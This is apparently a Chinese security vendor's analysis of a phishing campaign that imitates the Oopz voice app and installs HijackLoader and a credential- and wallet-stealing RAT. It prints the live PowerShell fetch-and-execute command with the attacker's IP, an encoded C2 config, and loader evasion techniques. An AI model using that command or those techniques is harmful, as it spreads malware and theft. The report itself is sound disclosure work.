
近期,火绒安全实验室在日常监测中发现,黑产团伙通过高度仿冒开黑语音工具Oopz的钓鱼网站(oopz.live),针对国内游戏玩家群体发起钓鱼投毒攻击。经火绒安全工程师分析,该攻击依托游戏语音工具的用户信任进行伪装,欺骗性极强,对经常下载语音、加速器、辅助工具的玩家群体威胁较大。攻击者诱导用户在本机执行恶意指令,从远端下载恶意MSI安装包并以静默方式安装至用户目录,全程无安装窗口或报错提示,受害者难以察觉。木马植入后,释放多个组件,通过多阶段加载、隐藏执行,并借助带数字签名的合法程序作为掩护,最终在内存中启动远控木马,可被远程操控,并存在窃取浏览器登录态、游戏账号及加密货币钱包等敏感数据的风险。目前,火绒安全产品已经实现对该行为的拦截与查杀。

查杀图


流程图

整体攻击链采用白加黑技术,解密并解压tracker_ctrl.json和pipelinedesc69.xml文件,将其注入合法的PE文件执行,最终加载远程控制木马。
本次攻击中,攻击者通过伪装的Oopz网站页面实施攻击。


诱导用户直接执行恶意指令。


实际执行的命令为:
powershell -c "iex(irm '93.152.224.13/adzBD58r3gIyBIQe '- UseBasicParsing)"
这条命令从 93.152.224.13/adzBD58r3gIyBIQe拉取恶意PowerShell脚本原地执行。从远端服务器下载一个恶意的MSI安装包,并无声无息地安装到用户目录中。整个过程中受害者不会看到任何安装窗口或报错提示。本次分析的样本以看似正常的.msi安装包形式存在,其CustomAction表未检测出异常。


释放出的文件列表如下:


其中libcrypto-1_1.dll为恶意dll,Smart-Encoder.exe伪装身份为「Microvirt Software Technology Co. Ltd.」的「MEmu Multiple Instances Manager」(逍遥模拟器),tracker_ctrl.json和pipelinedesc69.xml文件为经压缩和加密的恶意载荷数据文件。
安装.msi文件,系统启动Windows安装程序msiexec.exe,首先加载恶意libcrypto-1_1.dll,读取tracker_ctrl.json到内存。


从tracker_ctrl.json内存中的基址+偏移0x57AB的位置开始,四字节+0x1FCE9FBC还原出下阶段要注入的dll、配置信息以及要注入的内容。


然后加载系统中的tapisrv.dll(Windows系统中与TAPI相关的重要动态链接库文件),写入tapisrv.dll的.text节中,大小为0x16B0。


跳转到tapisrv.dll.text节偏移0xED0处入口执行下一阶段。
核心逻辑为通过PEB遍历与导出表哈希解析API;其载荷路径为:读取pipelinedesc69.xml文件→从????IDAT块中提取数据→XOR→LZNT1解压→按名称哈希定位代码块→ LoadLibrary加载目标模块→自入口点起覆写指定长度字节并转移执行。


将pipelinedesc69.xml文件完整读入内存,然后在该内存中搜索"????IDAT",命中后检查"IDAT"后4字节是否等于0x03F31DE8,根据IDAT前四字节获取块长度,拷贝到另一块内存,然后执行XOR解密,XOR密钥取自0x03F31DE8后4字节,数据长度取自XOR密钥后4字节。


使用RtlDecompressBuffer,压缩格式为COMPRESSION_FORMAT_LZNT1(值为2),将解密后的数据解压到新缓冲。


在解压的数据中有一个自定义表,表中存放着Hijackloader的各模块的配置信息,每个表项0x8A字节,结构为{ANSI名称字符串,相对偏移,块大小},分别对应图中红色、蓝色、黄色方框。


从内存中提取到HijackLoader携带的载荷,共37个模块。


部分模块的功能如下:
| 模块 | 大小 | 功能 |
| ti | 173KB | 主模块: PEB遍历、CRC32 API解析、SSN提取、模块调度、xor_decrypt_payload |
| SM | 118KB | 核心编排器:接收Ti传递的context ,按清单顺序加载执行所有功能模块 |
| TinycallProxy | 36KB | 32位调用代理:包装syscall参数 ,桥接Ti与底层API |
| TinycallProxy64 | 178B | 64位调用代理存根:检测IMAGE_FILE_DLL标志 , 区分注入方式 |
| modWriteFile | 10KB | 文件写入 |
| AVDATA_dir | 20KB | 杀软检测库:含360/卡巴斯基/avast等进程名CRC32 |
| ESAL | 784B | 模块清单(分配表):记录所有功能模块的入口和大小 |
| ESLDR | 154B | 模块清单(加载表):模块加载顺序和依赖 |
| ESWR | 1.5KB | 模块清单(写入表):模块写入目标路径配置 |
| CUSTOMINJECT | 332B | 自定义注入配置:指定注入目标和参数 |
| modCreateProcess | 6.7KB | 进程创建 |
| modCreateProcess64 | 1.5KB | 进程创建(64位) |
| ti64 | 173KB | PE DLL存根+170KB overlay shellcode |
| modUAC. | 12KB | UAC绕过 |
| modWD | 8KB | Windows Defender绕过 |
| modTask | 2KB | 任务管理:计划任务/注册表Run键持久化 |
| LauncherLdr64 | 308KB | 启动加载器:x86存根+内嵌Smart-Encoder.exe PE ,负责初始执行和模块装配 |
根据hash 0x00741CF5在上述解压的数据中匹配(匹配到ti模块),返回该项数据块的指针。


然后加载input.dll,将ti模块写入到input.dll的.text节中,跳转执行。


模块加载顺序为ti→SM→TinycallProxy→modWriteFile→SM→AVDATA_dir→rshell→ESAL→CUSTOMINJECT→CUSTOMINJECTPATH→TinycallProxy→modCreateProcess
modCreateProcess创建挂起进程SpeAnchor128.exe,修改上下文,使恢复进程后执行恶意逻辑,解密xxxx.tmp,并加载到内存,跳转执行第三阶段。其中SpeAnchor128.exe和xxxx.tmp被释放在Temp目录下,SpeAnchor128.exe为Ventis Media, Inc.签名的合法文件,xxxx.tmp为加密后的载荷文件。


本阶段的核心目的是:借用签名宿主进程执行恶意加载链,降低基于进程名/签名信任的检测效果。
本阶段运行在已被劫持的SpeAnchor128.exe进程中。从Temp读取并解密配置文件 ,对另一个.tmp执行LoadImage,跳转到映射映像内继续多层解密 ,还原并执行.NET加载器。
加载器解密内存中的Osnjm载荷。


Assembly.Load 后调用入口,进入RAT DLL主体。


C2配置yWIg在Cxvubmpomw的资源目录中。


解密后如下:


C2配置文件:
H4sIAAAAAAAACm3TNw7j2AEA0MUO4AEW2MXULrclMCLFIHKBLT75STF95txRzEEMEsV0Bp/GwBzAduFrGYZb169+f//537/+8hvB0t8J/PqdIOjvHPntHz++fPvnjy/f/vXjy1//9itSFJGGggDeRwU2hQeVYgPk1Pd+5xM1boON6HQ3T/ITGHzVzXXX3LkN54GNSwACDzni BrcYBrYNIajFxyAtRVgTsQcqacMPowUHatGBILqi1knvgD2QB04ElcPwlA2d8WFI4yaeooMAeweEL4JtU5w7vT+ifsxDcasqpUEAvwvufHeVBwltkQe2DwClCHAD/3UNjIoAbMHkHrRVIkN5RoJx4+rPW3H0oxDTpiMKcnKWUMomeyEXZun6ctKN/aNfRfPQA1yDDotZ0OJ252JpOFhD2l1i3Sv9JUlUqnvY6wEfGrtU9bqBdU+GCUlxermRMt3SjHWwLJbazC7XudxXY0yH0gOLboHkB2I0DZPqvemECcsLX2Ap/2hfhTi1WoRU20TlUFwGdVLyKaGblL/ISzh02oEY6ijMtlUS640RnfOaqRzqwAAcvbzSXq/BrYRyU9BZu4SO5N5WjiG8KIgW+UM2NWGxmRKaiuaeAqdfiGKNx4U8L0fSrdJrVyzdcLybBjSnpNxq+Ihl6AxkSYy3Igr29PPKKCZ7GxKmYrXpCdotctJsUYwJjjmvf17Pq3f013MnRK3dG4pbPGixp2rHKdG79yGGr+SYTnw0P5Vp+uLjer0dLiwn/WByGlS2qzspncsf1LS38tlLj13x80POTAUqeu0OKGso0Q+57YI+GS8nUvZQnaFlX35l2Xr5lkiePunyJQeYN5DDjunsGEDgjjnyljyUXAWr7EfgVsLCnLwpkMymdzM235IVOLfy2sueSptZtzVuR5cTVSl2ffARGyEDcjhxWE0kzKUrPkfW5oFRZRqmImltddc316VHqez3dQjOZp8pfbdhaVhyk0XdRF7dzM060KWWnYfmXK6SQzhzfCvgLoGkWNiPaisQ2IAfT2VDEOR8ZQSyTYlSZful5675R0v6hputebvBXKi5UHzaEf6/aw7uAVu+8MDfwCbyl/93E5gCqESgJ9blfGwu9GZJKnX18tyxFd7J6/pp08bUqHD0pRvE78dF1uRs9O7w8VbB/uQ09Shh2m28u2mt8zxpR2EWuDMfJuSdsNDaLE/ILiiLc2wdzXPeNKbhNzOs4m1uaDSxKl0N+SFyVNJxXiYd8Dq+GSkoHgl/zV3XZd7bwISDPvKab8b3NGlqJGpjBop6wCiZY7R557nbm8HDsfNq2S4Iw49RYmRQu9+XgxW0ow6y8Ag5+rhM8/bOeo2sypc5P+Q5Vt4OnaiMbMxZBDW56qMAoHbDVp5RLrMhscI4Xd4R6S1idl7Joe2t4LlNehrP/jUlm6jjrxIK/e7etNIGHIKrC3GqtWVnTJ6CLNhdCXtsjILTQyVgSUxGJlPV0lrmiAE1Z4UWrToVmuNQCneUP+N152LNwKHWOelHjzzV4BZrk2cjQiKXFIV6PvWHFlu9XmuzdtdVbi6U7b13140Vt+KewPWFFFH4rKWIzTzEwgJ7WddjjN2betTxqJwahqWs0dzeylHVyRKwpb8KBVW0jVpVYEwFpmazCb+kN/Kw+CU/qCfn8hv6+DauL+3RWO2lD+qDCgor4JF17sjtsGeHt5JoTu7H9zX5wihUf82EKqp4T+7yRK/eouTcK6xXTKMCPKOoHN7obyWMCI/yhio1XrO4oWFYKDMQg1dqRlI9YLqA31k2w3JdFbUp+/P3r7Ao00+//PET/xVYFgQe UP9inZ/hkf4H1Hb9+csGAAA=
依次进行Base64解码、Deflate解压、Protobuf反序列化。


Protobuf结构
| 字段号 | 值 | 说明 |
| 185.102.115.93 | C2主机 | |
在解密后的资源文件yWIg中还发现了浏览器数据以及钱包名字符串,带有很明显的信息窃取和钱包窃取意图。


本次事件为一起以仿冒Oopz开黑语音软件的钓鱼网站为入口,通过伪装MSI安装包投递的恶意软件攻击活动。样本以正常软件安装包为外观进行伪装,在受害主机中通过多阶段加载、进程迁移、签名进程掩护、内存执行等多层规避手段,最终启动.NET远控木马(RAT),建立TLS加密C2通信通道,并支持远程内存加载插件。结合投递方式、加载框架与终端行为能力分析,可判定该样本为典型的远控类恶意软件加载链;通过样本字符串与配置信息进一步分析可知,该木马具备持久化驻留能力,且存在窃取浏览器登录态、加密货币钱包等敏感数据的明确意图。
认准官方渠道:仅通过您已知且日常使用的官方网站或官方应用商店下载软件,请勿轻信搜索结果第一条广告、陌生私聊或来路不明的“更新包”链接;
仔细核对网址:钓鱼网站常采用与正版服务相近的域名或后缀,即使页面仿真度极高也不可轻信;无法确认网址合法性时,请从浏览器收藏夹或官方公众号、客服公布的官方地址访问;
警惕“免安装/绿色版/破解版”软件:即便文件带有数字签名、图标与正版一致,也有可能是被滥用的伪装程序;
若已误下载安装:请立即停止使用该软件,断开非必要网络连接,向单位IT或安全人员报告,并可考虑修改游戏、邮箱、支付等重要账号的密码。
ea9952ba70f262b42ecc8cd9140ae559
ee4c0d05606ce8f096654942fc4160d4dcb95795410a24244ac2aac80d4822c4
43a0d11fd11e1adb55647d01155d9ae4
www.oopz.live
C:\ProgramData\SyncKubernetes_stdC:\Users\[用户名]\AppData\Roaming\SyncKubernetes_stdC:\Users\[用户名]\AppData\Local\Temp\SpeAnchor128.exeC:\Users\[用户名]\AppData\Roaming\SyncKubernetes_std\Crisp.exe
93[.]152[.]224[.]13/adzBD58r3gIyBIQe
185[.]102[.]115[.]93:56001185[.]102[.]115[.]93:56002185[.]102[.]115[.]93:56003
火绒安全成立于2011年,是一家专注、纯粹的安全公司,致力于在终端安全领域为用户提供专业的产品和专注的服务,并持续对外赋能反病毒引擎等相关自主研发技术。多年来,火绒安全产品凭借“专业、干净、轻巧”的特点收获了广大用户的良好口碑。火绒企业版产品更是针对企业内外网脆弱的环节,拓展了企业对于终端管理的范围和方式,提升了产品的兼容性、易用性,最终实现更直观的将威胁可视化、让管理轻便化,充分达到保护企业信息安全的目的。




夜雨聆风